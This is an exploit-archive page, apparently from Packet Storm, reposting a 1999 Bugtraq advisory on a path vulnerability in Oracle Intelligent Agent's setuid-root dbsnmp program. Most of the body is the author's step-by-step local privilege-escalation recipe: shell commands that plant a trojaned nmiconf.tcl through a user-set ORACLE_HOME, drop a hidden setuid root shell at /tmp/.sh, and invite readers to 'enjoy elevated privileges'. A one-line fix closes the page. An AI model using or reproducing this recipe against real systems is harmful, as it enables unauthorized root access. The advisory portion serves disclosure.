exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

oracle_intelligent_agent.txt

oracle_intelligent_agent.txt
Posted Oct 12, 1999
Authored by mujahadin

Oracle installations with the 'Oracle Intelligent Agent' installed have a path related vulnerability. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin . This setuid root program calls a tcl script (nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The problem is that the dbsnmp script relies on an environment variable (the path to nmiconf.tcl) which can be a set by a user. Therefore, intruders can force the script to execute a trojaned version of nmiconf.tcl which will run as root.

tags | exploit, root, trojan
SHA-256 | 0f333e0cee58f483618cb5b045cda5dd5f3845e5f50149416ee043fd7957d53a

oracle_intelligent_agent.txt

Change Mirror Download
START OF BUGTRAQ POST

Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp program located
in $ORACLE_HOME/bin . This setuid root program calls a tcl script
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The
problem is that the dbsnmp script relies on an environment variable (the
path to nmiconf.tcl) which can be a set by a user. Therefore, intruders
can force the script to execute a trojaned version of nmiconf.tcl which
will run as root.

END OF BUGTRAQ POST


apparently, as we see from above, $ORACLE_HOME would need to be reset for
this exploit to work properly. so lets do it.

first of all, drop to a bourne or korn shell and do the following:
-------

echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345
mkdir -p /tmp/whatever/network/agent/config
export $ORACLE_HOME=/tmp/whatever
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF

# or even an exec call instead of system... whatever...

cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF

-------
mileage may vary widely with your OS and tcl version,
so this is merely a template of the process involved...
however all one needs to do to make this a reality
is run the OLD dbsnmp program and you will spawn a
root shell in /tmp called /tmp/.sh
execute the root shell and enjoy elevated privileges.

NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable.
theres no reason to have it set in the first place as root should
be the only user really to allow an SNMP paradigm to run anyways.
duh


" ...it takes a good man to beat me... it just doesnt take very long."

.|.. ..|.
mujahadin

no extra charge for typos



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close